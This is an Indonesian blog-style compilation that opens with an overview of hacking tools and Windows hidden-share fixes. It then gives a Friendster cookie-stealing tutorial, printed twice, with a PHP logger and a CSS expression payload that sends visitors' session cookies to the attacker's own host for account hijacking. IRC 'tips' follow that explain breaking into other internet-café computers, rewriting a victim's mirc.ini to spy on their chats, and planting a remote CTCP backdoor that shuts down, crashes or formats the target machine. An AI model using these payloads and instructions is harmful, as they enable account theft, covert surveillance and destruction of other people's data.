Jika artikel ini mengetengahkan tools yang digunakan hacker, maka mungkin Anda berpikir untuk menjadi seorang hacker cukup hanya dengan menggunakan semua tools tersebut. Sehingga mungkin Anda menganggap hacker adalah orang yang paling suka membaca manual penggunaan suatu software/tools. Anggapan ini keliru karena ada poin penting yang membedakan antara hacker dan orang yang hanya menggunakan tools hacking. Hacker memiliki skill dan dasar pengetahuan yang kuat. Sementara orang yang hanya menggunakan tools sering disebut dengan script kiddie. Salah satu bekal seorang hacker adalah skill dalam environment Linux, perintahperintah dasar Linux wajib dikuasai. Sebagai perbandingan perintah Linux dan perintah DOS/Command Prompt Windows dapat dilihat pada tabel1.
Telnet
Salah satu senjata hacker yang sederhana tetapi powerful adalah telnet. Dengan menggunakan telnet, Anda dapat mengakses sebuah host dan melakukan aktivitas didalamnya, di manapun Anda berada. Telnet umumnya telah tersedia build-in pada operating system keluarga Unix/Linux maupun Windows dan menggunakan default port 23 untuk melakukan koneksi. Anda dapat melakukan koneksi melalui port yang lain dengan menuliskan nomor port yang diinginkan, misalnya port 25 untuk SMTP atau port 80 untuk HTTP. Umumnya hacker menggunakan telnet untuk mengakses router atau server. Tentu saja router dan server yang diakses akan meminta otorisasi, karena itu jangan menggunakan password default atau password yang mudah ditebak. Kemampuan telnet memungkinkan Anda untuk mengirimkan e-mail, menciptakan shell account, melihat atau melakukan modifi kasi website, dan lain sebagainya. Perintah- perintah dalam telnet menggunakan perintah UNIX. Sebagaimana seseorang yang ingin menyusup ke sebuah rumah, penyusup tersebut hanya bisa masuk jika terdapat pintu atau jendela. Dalam sistem komputer, pintu, dan jendela tersebut adalah port. Sebuah komputer tanpa ada port yang terbuka ibaratnya adalah sebuah rumah tanpa pintu dan jendela. Dengan telnet, seseorang dapat menguji apakah port dengan nomor tertentu dalam keadaan open, hanya dengan mengetikkan telnet namaserver nomor_port. Contohnya jika Anda mengetikkan telnet domaintarget.com 25, perhatikan respon yang tampil, jika telnet hanya menampilkan pesan koneksi gagal, maka port 25 tidak tersedia untuk diakses secara remote.
Search Engine
Jika Anda memiliki website yang tiba-tiba di-hack oleh seseorang, jangan langsung menuduh pelakunya adalah pemilik warung kopi dimana Anda sering berhutang, siapapun berkesempatan menemukan website Anda melalui Internet search engine seperti Google, Yahoo!, Altavista, dan lain sebagainya. Khususnya yang cukup banyak mendapat sorotan adalah Google, bahkan kombinasi perintah yang disediakan Google telah menciptakan istilah Google Hacking karena kemampuannya menampilkan informasiinformasi yang mendukung proses hacking tersebut. Salah satu contoh sederhana, ketikkan perintah inurl:login.asp pada google. com, maka dalam sekejap akan ditampilkan jutaan halaman yang mengandung login.asp pada URLnya. Lalu dimana bahayanya? Login.asp adalah penamaan file yang umum untuk melakukan login pada website dengan bahasa ASP (Active Server Pages), dengan menemukan URL tersebut, ibaratnya seseorang telah menemukan pintu masuk untuk memperoleh akses yang lebih tinggi pada website Anda. Dengan mencoba teknik seperti SQL Injection, mencoba username dan password yang umum, brute force, dan bermacam teknik lainnya, maka jangan heran jika Anda memiliki statistik kunjungan halaman web Anda, kemudian mendapatkan halaman yang paling sering diakses adalah login. asp! Tentunya Anda perlu berhati-hati jika mendapatkan hal seperti ini.
Web Tools
Seseorang yang bermaksud buruk tidak ingin identitasnya diketahui, dan mungkin menggunakan proxy luar agar jejaknya sukar dilacak. Cara lainnya mungkin ia akan menuju sebuah warnet dan menjalankan aksinya. Kalau membayangkan seorang hacker sedang berjalan menuju warnet, mungkin Anda membayangkan hacker tersebut telah menyimpan berbagai tools supercanggih didalam fl ash disk yang akan dijalankannya pada komputer warnet. Tetapi ternyata tidak selalu harus demikian, jika semua yang dibutuhkan hacker tersebut telah tersedia di Internet. Beberapa website telah hadir sebagai tools untuk menjalankan aksi yang diinginkan hacker, contohnya adalah http://netcraft.com yang dapat melaporkan informasi sebuah domain, IP Address, DNS, dan lain sebagainya. Contoh website lainnya adalah http://centralops. net, yang menyediakan utilitas yang bervariasi, misalnya tools untuk melakukan investigasi e-mail address, investigasi domain sehingga menghasilkan informasi WhoIs, trace route, hingga service scan. Untuk apa semua informasi tersebut bagi hacker? Ternyata bisa jadi informasi tersebut adalah informasi vital untuk hacker, dan dapat berakibat fatal bagi korban. Misalnya informasi mengenai contact person, dapat digunakan untuk melakukan social engineering, informasi mengenai web server, dapat digunakan untuk menemukan vulnerability web server tersebut, bahkan informasi mengenai nomor telpon, dapat digunakan untuk target serangan salah satu teknik hacking yang disebut war dial.
Cain & Abel
Cain & Abel merupakan suatu aplikasi desktop berbasis Windows, memiliki tujuan utama untuk recovery password dengan berbagai metode, seperti packet sniffing, dictionary attack, brute attack, ataupun cryptanalysis. Attack Walaupun diklaim oleh pembuatnya bahwa Cain & Abel tidak mengandung malware, tetapi beberapa anti virus mendeteksi Cain & Abel sebagai malware bernama Win32: Cain-B [Tool]. Kemampuan lain dari Cain & Abel adalah mampu melihat password di belakang karakter asterisk, VoIP Filtering, dan masih banyak lagi yang membuat Cain & Abel merupakan salah satu tools terlengkap yang dapat Anda peroleh secara gratis saat ini.
KeyLogger
Bayangkan jika setiap penekanan tombol keyboard yang Anda lakukan terekam dengan diam-diam untuk kemudian dilihat oleh seseorang, tentu hal yang menjengkelkan, bukan? Hal inilah yang dilakukan tools dalam kategori keylogger. Cukup banyak software kategori keylogger yang dapat Anda dapatkan di Internet dengan nama-nama yang aneh dan seram. Bayangkan apa akibat yang dapat terjadi jika sebuah software keylogger beraksi, mungkin Anda tanpa sengaja telah menyerahkan nomor kartu kredit, password e-mail, surat cinta, curhat, dan apapun yang telah Anda ketikkan pada keyboard Pada umumnya program keylogger akan bersembunyi pada background sehingga tidak mudah dideteksi keberadaannya setiap penekanan tombol keyboard direkam dalam sebuah fi le ataupun dikirimkan pada pemasang program. Jika komputer yang digunakan bukan komputer Anda, tentu mudah untuk memasang program keylogger. Tetapi tidak berarti komputer pribadi Anda yang terkunci dalam kamar aman dari keylogger, keylogger masih dapat terinstal pada background melalui berbagai jenis malware atau rootkit, atau jika seseorang dapat menguasai komputer Anda secara remote. Jika Anda cukup paranoid, kebetulan berada di warnet dan menganggap komputer yang sedang digunakan terdapat keylogger, maka Anda dapat berkreasi (atau kurang kerjaan) mengakali keylogger dengan mengetikkan huruf a sampai z pada notepad, kemudian menggunakan mouse untuk menyorot huruf dan melakukan copy paste huruf demi huruf yang ingin Anda tulis. Apakah tidak ada cara yang lebih terhormat selain cara aneh di atas yang membuat Anda menjadi pusat perhatian seluruh pengunjung warnet? Untungnya ada, yaitu Anda dapat menggunakan virtual keyboard (On-Screen Keyboard) yang disediakan Windows dan terletak pada menu Start – All Programs – Accessories – Accessibility – On Screen Keyboard. Apakah permasalahan telah selesai? Ternyata belum, karena ternyata pembuat software semakin berkembang dan tidak saja dapat merekam penekanan tombol, tetapi bisa jadi juga mengambil capture layer secara diam-diam. Sebagai solusinya, terdapat software antikeylogger yang umumnya melakukan block atau mendeteksi aktivitas keylogger, juga melakukan block terhadap screen capture.
Retina
Retina merupakan tools untuk melakukan scan terhadap vulnerability sebuah system komputer, informasi vulnerability yang ditampilkan Retina tergolong cukup lengkap, bahkan pada beberapa bagian Retina juga menyediakan solusinya. Anda dapat menjalankan Retina untuk melakukan scan pada sebuah domain Internet ataupun komputer pada LAN. Contoh vulnerability yang sering ditemui pada jaringan LAN adalah saat sebuah komputer membiarkan account Administrator dapat diakses tanpa password, atau menggunakan password standard. Kelemahan lainnya yang dapat ditemukan dengan mudah oleh Retina adalah membiarkan default-hidden share drive pada komputer Anda. Tahukah Anda bahwa sistem operasi Windows XP dan family-nya secara otomatis menciptakan drive share yang tersembunyi untuk masing-masing drive yang tersedia? Artinya, jika Anda memiliki drive C dan D, maka kedua drive tersebut sebenarnya di share tanpa terlihat, kecuali saat Anda menyertakan karakter $ di depan huruf drive. Jadi seseorang di dalam jaringan LAN dapat saja mengakses drive C Anda dengan mengetikkan \\nama_computer_anda\C$, memasukkan username dan password yang valid (bayangkan jika Anda membiarkan account Administrator tanpa password), dan terbukalah seluruh drive C Anda, tanpa Anda secara sengaja melakukan share terhadap drive C. Tidak hanya drive C$, D$, atau E$ yang di share secara tersembunyi, tetapi juga ADMIN$, FAX$, IPC$, NetLogon, dan PRINT$. Ini adalah vulnerability fatal yang tidak disadari oleh banyak pengguna komputer dengan sistem operasi Windows. Untuk itu, Anda harus memastikan setiap account yang dapat mengakses komputer Anda memiliki password yang tidak mudah ditebak. Solusi lainnya Anda dapat menghapus hidden-share tersebut agar share tersebut hilang secara permanen, Anda perlu mengubah nilai registry. Untuk komputer server yang menggunakan Windows NT 4.0/W2K, Windows Server 2003, perubahan registry adalah sebagai berikut:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\ Services\LanManServer\Parameters
Name: AutoShareServer
Data Type: REG_DWORD
Value: 0
Jika tidak terdapat name AutoShareServer, Anda dapat menciptakan item DWORD value yang baru dari program registry seperti RegEdit. Sedangkan, untuk komputer workstation yang menggunakan Windows NT 4.0 Workstation/ W2K Pro/XP Pro, perubahan registry adalah sebagai berikut:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\ Services\LanManServer\Parameters
Name: AutoShareWks
Data Type: REG_DWORD
Value: 0
Jika tidak terdapat name AutoShareWks, Anda dapat menciptakan item DWORD value yang baru dari program registry seperti RegEdit. Restart komputer Anda agar perubahan pada registry terupdate pada sistem Anda, jika pada suatu saat Anda ingin mengembalikan pada keadaan default, ubah nilai value pada registry menjadi 1. Masih banyak lagi informasi vulnerability yang mampu ditampilkan oleh Retina bagaikan seorang dokter yang memeriksa kesehatan pasiennya, terkadang sang pasien dapat terheran-heran bahwa dirinya ternyata tidak sesehat (baca: tidak seaman) yang dikira.
Senjata Utama
Tentunya tidak mungkin membahas secara komplit seluruh tools yang tersedia, tetapi seorang hacker memiliki satu “tools” atau senjata utama yang unik. Tools yang paling sulit sekaligus senjata utama hacker adalah kreativitas. Tentunya kreativitas harus didukung oleh pengetahuan dan wawasan agar selalu berkembang, sering kali vulnerability atau kelemahan baru pada sistem ditemukan karena kreativitas dan kegigihan hacker yang mampu memanfaatkan kesalahan pemrograman atau bugs sistem tersebut. Contohnya adalah teknik SQL Injection, yang memanfaatkan kesalahan pemrograman yang tidak melakukan validasi terhadap input, sehingga input dapat dimanipulasi agar database melaksanakan instruksi yang dikehendari hacker. Anda dapat membayangkan betapa kreatif dan luas pengetahuan sang penemu SQL Injection yang kali pertama. Sebuah serangan yang kreatif dapat muncul dari mana saja tanpa disadari oleh korban, dan terkadang serangan tersebut tidak menggunakan tools ataupun skill yang canggih. Sebagai contoh kasus yang mungkin dapat Anda temui sehari-hari, sebuah perusahaan menutup akses browsing dengan alas an keamanan, dan terhindar dari situs-situs yang mengandung trojan, worm, virus, dan ancaman lain yang dapat berasal dari penggunaan browser. Tetapi karena perusahaan memerlukan sarana komunikasi yang praktis maka akses untuk e-mail diijinkan, termasuk menerima e-mail dalam format HTML. Di sinilah sebuah serangan dapat terjadi tanpa melalui browser, hanya memanfaatkan e-mail yang dapat menerima format HTML. Seperti Anda ketahui, HTML dapat mengandung (embedded) object-object ataupun JavaScript yang dieksekusi pada computer client. Misalnya seorang hacker ingin mengetahui IP Anda, ia dapat meng-upload gambar pada sebuah server, membuat HTML yang memanggil gambar tersebut dan mengirimkan e-mail HTML tersebut kepada Anda. Saat Anda menerimanya, e-mail client Anda akan men-download gambar tersebut dari server hacker, sang hacker cukup melihat pada log server-nya dan mendapatkan IP Anda! Jika antivirus dianggap selalu ketinggalan satu langkah dengan virus, maka seharusnya tidak demikian dengan dunia hacking. Jangan biarkan Anda diserang dulu baru kemudian mempertahankan diri. Sudah terlambat. Berpikir dengan cara pikir lawan, dapat membantu Anda menemukan kelemahan sistem Anda sendiri dan menemukan solusi untuk mengatasi serangan yang telah Anda prediksikan.
Penutup
Saat Anda telah mengetahui bahwa terdapat sedemikian banyak tools yang dapat merugikan orang lain, mungkin Anda berpikir untuk mengadakan demo pemberantasan tools tersebut dan menyeret pembuatnya ke meja hijau. Sayangnya, hal tersebut bukanlah cara yang tepat untuk melindungi sistem keamanan jaringan dan komputer Anda. Tidak semua tools yang digunakan hacker dibuat untuk tujuan yang merugikan, tools tersebut juga berguna untuk network administrator, white hat hacker, konsultan keamanan, pengajar, dan lain-lain. Semuanya tergantung pada alasan dan motivasi untuk menggunakan tools tersebut, apakah ada alasan etik ataukah memang bermaksud merugikan orang lain. Sebuah tools menjadi bermanfaat atau merugikan, tergantung dari pemakai tools tersebut. Hal yang sama juga berlaku untuk tools seperti keylogger, bukankah keylogger akan menjadi tools yang bermanfaat jika digunakan untuk memonitor aktivitas anak dalam menggunakan komputer, atau bisa juga digunakan sebagai backup pekerjaan, bukan? Sebaliknya, tools standar pada system operasi yang sudah jelas diciptakan agar bermanfaat bagi pengguna, juga dapat disalahgunakan. Misalnya perintah format, akan menjadi tools yang seram jika digunakan oleh orang lain untuk memformat drive yang berisi seluruh data penting Anda. Pada akhirnya, kombinasi dari pengetahuan dan kode etik juga lah yang akan membawa kita menggunakan tools apapun dengan baik!?
_ http://www.skullbox.net/telnethack. php
_ http://en.wikipedia.org/wiki/ Vulnerability_%28computing%29
_ http://support.microsoft.com/ kb/314984
hack friendster (semua kejadian bukan tanggung jawab saya)
Sebelumnya maap klo ripos..
Ga usah pake basa basi
Yang perlu di sediakan:
-Punya account FS (Wajib)
-Punya website yg support PHP
-Pake Firefox !! (Yay..!! FF Rules..!!)
-Extension Add n Edit Cookies, Download Buat FF 0.9 - 1.6 , Buat FF 2.0
-Rokok, Kopi and cemilan. Biar ga BT or Laper
Langkah² :
Bikin file cook.php (nama diganti yg lain juga bisa). Isi dari file:
PHP Code:
< ?php
$kokis = $HTTP_GET_VARS[‘kukis’];
$filename = “cok.log”;// metoda dengan append append
$handle = fopen($filename, ‘a’);
fwrite($handle, $kokis);
fClose($handle);
// redirect-in ke punya tmn lo
echo ““;
?>
-Upload file tersebut ke web hosting lw yg support PHP.
-Login ke FS
-Masuk ke edit profile yg bagian CSS (Customize)
-Paste code berikut di bagian CSS.
Code;
body{
height:expr/**/ession(document.location='http://www.site-elu.com/cook.php?kukis=’+document.cookie)
}
Ganti www.site-elu.com dengan domain lw.
Udahh…
Loh kok udah..?? Trus nge-hacknya gimana..??
Sabar broo.. Setiap orang yg buka profile lw dengan browser Internet Explorer, cookiesnya akan tercatat di file cok.log di site lw.
Cara gunainnya:
-Buka _http://www.site-elu.com/cok.log
-Cari cookies dengan nama friendster_auth=, yang lain di biarin aja. Contoh hasil :
Code: uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*
Replace karakter ascii “=” dengan %3D
Replace karakter ascii “?” dengan %26
Replace karakter ascii “*” dengan %2A
Hasilnya :
Code: uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac%3D
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk%2A
-Bukan AnEC Cookie Editor Di FF
-Filter cookies dari Friendster.com
-Cari nama cookies friendster_auth, edit!
-Ganti contentnya dengan yg sudah kita dapat. Save! Cookies lain dari friendster boleh dihapus.
-Buka _http://www.friendster.com/ dan silahkan nyengir
NB:
Hanya bekerja pada browser Internet Explorer
Menerima sumbangan GRP dengan sukarela..
Bosen Internet Lambat? Gunakan Selalu FireFox Dengan Google Toolbar, Dijamin Lebih cepat dari pada firefox biasa.
Ga usah pake basa basi
Yang perlu di sediakan:
-Punya account FS (Wajib)
-Punya website yg support PHP
-Pake Firefox !! (Yay..!! FF Rules..!!)
-Extension Add n Edit Cookies, Download Buat FF 0.9 - 1.6 , Buat FF 2.0
-Rokok, Kopi and cemilan. Biar ga BT or Laper
Langkah² :
Bikin file cook.php (nama diganti yg lain juga bisa). Isi dari file:
PHP Code:
< ?php
$kokis = $HTTP_GET_VARS[‘kukis’];
$filename = “cok.log”;// metoda dengan append append
$handle = fopen($filename, ‘a’);
fwrite($handle, $kokis);
fClose($handle);
// redirect-in ke punya tmn lo
echo ““;
?>
-Upload file tersebut ke web hosting lw yg support PHP.
-Login ke FS
-Masuk ke edit profile yg bagian CSS (Customize)
-Paste code berikut di bagian CSS.
Code;
body{
height:expr/**/ession(document.location='http://www.site-elu.com/cook.php?kukis=’+document.cookie)
}
Ganti www.site-elu.com dengan domain lw.
Udahh…
Loh kok udah..?? Trus nge-hacknya gimana..??
Sabar broo.. Setiap orang yg buka profile lw dengan browser Internet Explorer, cookiesnya akan tercatat di file cok.log di site lw.
Cara gunainnya:
-Buka _http://www.site-elu.com/cok.log
-Cari cookies dengan nama friendster_auth=, yang lain di biarin aja. Contoh hasil :
Code: uid=33674163&lastclick=1163646748&cty=id&icty=au&mac=
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk*
Replace karakter ascii “=” dengan %3D
Replace karakter ascii “?” dengan %26
Replace karakter ascii “*” dengan %2A
Hasilnya :
Code: uid%3D33674163&lastclick%3D1163646748&cty%3Did&icty%3Dau&mac%3D
ODEwYjgyMjE1ZDAwYTlkM2Q0NTc5ZjM3MmMyMzY3ODk%2A
-Bukan AnEC Cookie Editor Di FF
-Filter cookies dari Friendster.com
-Cari nama cookies friendster_auth, edit!
-Ganti contentnya dengan yg sudah kita dapat. Save! Cookies lain dari friendster boleh dihapus.
-Buka _http://www.friendster.com/ dan silahkan nyengir
NB:
Hanya bekerja pada browser Internet Explorer
Menerima sumbangan GRP dengan sukarela..
Bosen Internet Lambat? Gunakan Selalu FireFox Dengan Google Toolbar, Dijamin Lebih cepat dari pada firefox biasa.
Tips dan triks IRC (Special)
--------------------------------------------------------------------------------
Tips dan triks IRC (Special)
Tips dan triks IRC ini sangat populer di kalangan chatter karena tips dan triks ini berisi cara melindungi identitas diri kita dari para chatter lainnya sekaligus juga dapat untuk mengetahui keberadaan teman chatting kita, memata-matai dia, melihat isi chattingan dia sampai meremote mIRC teman chatting kita tersebut.
Tips di IRC
Nih tips untuk para chatter IRC, mau tahu ?
Pertama-tama..
Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :
1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis
2. Periksa pada option Connect lalu pada identd, gantilah "user id" jika ada nomor room tertulis disini.
3. Periksa pada option IRC lalu pada Logging, gantilah menjadi "none" pada "automatically logs" jika posisi diluar itu.
4. Periksa pada Windows Task Manager apakah ada Keylogger terpasang :)
Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.
Efek jika tidak menuruti tips diatas maka efeknya adalah :
1. jika "user id" tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri
2. Jika pada logging bukan "none" maka bersiap-siaplah isi chattingan anda dilihat orang ketiga
3. Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya, tapi dari semua itu anda tidak perlu resah karena kenyataanya sangat jarang ada user melakukan hal ini karena warnet-warnet saat ini telah dilengkapi program-program canggih untuk menangani hal beginian (restore).
hehehehehe,,,,,,,,,,,
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC
Tips tambahan khusus para chatter yang ingin menyembunyikan diri
Jika anda ingin chatting benar-benar tidak ingin ada yang tahu keberadaan anda maka anda bisa mengikuti tips kehati-hatian ini, karena memang kadang tips ini sering kali dilupakan karena memang tips ini sedikit gerah untuk dilaksanakan, tapi gak ada salahnya kan kita mencoba ?
1. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika anda mengaktifkannya maka pada saat keluar dari IRC maka pesan ini akan muncul di channel dan orang lain akan mengetahui dimana anda berada saat chatting.
2. Ssetelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname,. alternativ dan user id anda.
3. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda.
Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.
hehheheh,,,,,,,,,,,,
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC II
Tips agar kita tidak diremote atau dipermainkan di IRC
Sudah biasa banyak sekali spam di IRC yang menganggu contohnya ini :
WANNA BE OPERATOR #channel ?? copy/paste this-> < <== Jangan copy paste di mIRC anda kalau ada hal beginian karena dapat merusak / menyerang komputer anda (Sering ada di channel-channel besar, webmaster dah cek ) STOP SPAM copy/paste this-> <<== Ini juga sama saja Cara menangani para cracker : 1. Periksalah remote mIRC anda caranya Tahan Alt lalu tekan R. 2. Biasanya mIRC-mIRC warnet dikosongkan remotenya tapi jika ada isinya lebuh baik delete remote yang sekiranya aneh (asing). 3. Periksa timer anda, caranya (ketik /timer ) jika misal ada timer yang bekerja ketik //!timers off 4. Menghilangkan decode : Ketik kode ini di mIRC : //!timers off !ignore -r !unload -rsn " $+ $chr(160) $+ . $+ $chr(160) $+ " !remove " $+ $chr(160) $+ . $+ $chr(160) $+ " !say $script($script(0)) Penulis : BeRgUnDaL.... Referensi rhega (OP #Yogyakarta) Triks di IRC : Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ? masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda harus mencari program scan antivirus dan trojan, anda dapat mendownloadnya berdasar referensi DAL.NET pada saat pesan terahkir connect. Bagaimana cara melacak keberadaan teman chat kita ? Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org, :) Bagaimana cara melacak boks warnet teman chat kita ? Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda "@ip addreas", jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda. Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)? D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini. Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel) /who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda). Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ? cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita. Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di "c:\program files\mirc\logs". Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di "c:\program files\mirc" lalu buka file mirc.ini. Jika anda mengalami masalah tiap komputer dipassword maka anda dapat memanfaatkan program Internet Maniac beserta PQwak, jika tiap komputer menggunakan Windows XP, tembus aja pakek KAHT yang bisa kamu download disini. Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagaimana caranya ? Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada "connect" lalu "firewall', firewall support diganti "server", protocol diganti "proxy" lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan. Referensi untuk mendapatkan proxy : - http://www.proxyweb.net - http://proxy.lessel.us/cgi-bin/nph-proxy.cgi - http://www.multiproxy.org - http://www.publicproxyservers.com/index.html - http://www.hotscripts.com/Detailed/28480.html - http://www.inetprivacy.com/a4proxy/anonymous-grc.htm - http://www.sa6ry.com/surfanonymous/faq/hide-ip-address.html - http://www.steganos.com (proxy) - http://www.guardster.com (free proxy) - http://www.anonymizer.com/index.cgi (proxy) - http://www.orangatango.com/home/index.ie.html (proxy) - http://proxify.com - http://www.tehbox.com/proxy - http://www.proxy4free.com/index.html - http://www.stayinvisible.com/index.pl - http://free-proxies.com (Referensi Proxy dari Si Cebol, Indonewbies.tk) Menampilkan ip-ip addreas para chatter di channel? Pada Option lalu pilih IRC lalu aktifkan / centang pada Show Ip Addreasess Penulis : BeRgUnDaL *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member) Special triks di IRC : Melihat seluruh isi chattingan teman kita disatu warnet walaupun komputer client / server tidak dishare sama sekali ! Luar biasa ! (Ilmu rahasia kreasi webmaster sendiri pada bulan November 2004) Syarat untuk melakukan teknik memata-matai orang chatting di satu jaringan LAN (Local Area network) adalah sebagai berikut : 1. Menguasai MS-DOS dengan baik (Karena disini semua menggunakan DOS) 2. Punya logika yang baik dan dapat mengetik cepat (Karena disini anda dikejar dengan waktu dan membutuhkan pemikiran yang cepat) Baiklah kita langsung saja, terapkan ilmu KaHT seperti ditutorial hacker lalu untuk masuk ke komputer sasaran, setelah anda masuk dikomputer tujuan, segera anda masuk ke MiRC komputer sasaran biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc") A. Untuk komputer yang drive D-nya di share : Saat ini anda periksa apakah komputer sasaran drive d-nya dishare ? jika ya ikuti cara dibawah ini jadi kodenya seperti dibawah ini kalau mau lengkap seperti ini [dirs] logdir=d:\ [options] n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0 setelah itu tekan ctrl + z untuk menyimpan, lalu tinggal anda masuk ke drive D komputer tersebut melalui LAN yang tentu saja sudah dishare, jadi cukup double klik aja files berekstensi log, lalu buka files itu pakek notepad untuk melihat terus isi chattingannya. Jadi kesimpulannya yang membuat penyimpanan file log di drive D karena perintah : [dirs] logdir=d:\ Jika anda bingung dalam menghitungkan angkanya diatas, ini urutannya untuk mempermudah: 1. 5=1x 2. 100=1x 3. 0=7x 4. 1=1x 5. 0=1x 6. 1=7x 7. 0=2x 8. 1=3x 9. 0=1x 10. 5=1x 11. 0=5x 12. 1=1x 13. 0=2x B. Untuk komputer sasaran tidak dishare : Setelah anda membaca cara A Lalu sekarang bagaimana jika drive d tidak dishare ? tidak masalah ! kita tetap bisa mengikuti isi chattingan dia, caranya seperti diawal tadi yaitu cari dahulu program mIRC komputer sasaran yang biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc") Setelah kita masuk didirektory MiRC, ketik "del mirc ini" setelah itu ketik "copy con mirc.ini" lalu ketik kode rekam mirc.ini dibawah ini : [options] n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0 setelah itu tekan ctrl + z untuk menyimpan, lalu silahkan tengok di "c:\progra~1\mirc\logs" cara melihat cukup ketik "type nickname.log* * : Nickname diisi nick orang Luar biasa buka, ingat sebagai catatan, Agar teknik berjalan baik maka teknik ini dilakukan / diterapkan pada semua boks warnet sebelum chatter tersebut chatting diboks tersebut, atau kalau udah terlanjut dia chatting di boks tersebut maka diset rekam aja MiRCnya gpp, sapa tahu MiRCnya error lalu dia buka lagi, :) Dari tutorial ini maka dimanapun anda berada, semua isi chatting anda dapat dilihat orang walaupun anda tidak menyadarinya, "anda tidak melihat kami tapi kami melihat anda" :)) Penulis : BeRgUnDaL *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member) Remote IRC (Mengontrol 100% segala chattingan user) ketikkan perintah "ctcp *:*:?:$1-" ke dalam remote mIRC sasaran lalu masukan juga di dalam variables "%master Nick_kamu". Perintah mengontrol komputer target : /ctcp run rundll user,#7 : Melakukan Shutdown komputer sasaran /ctcp run rundll user,#3 : Membuat Crash / Hang komputer sasaran /ctcp run rundll user,#4 : Mengacaukan tampilan yang ahkirnya komputer sasaran Crash /Hang /ctcp run format /y : Melakukan format pada komputer sasaran /ctcp run http://.com : Membuka situs sesuai keinginan kamu /ctcp /nick : Mengganti nick mIRC sasaran (Perintah lainnya dapat dilihat di Peritah DAl.NET) *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member) Kedasyatan Hennes Script NW v0.61 IRC Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61 Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat 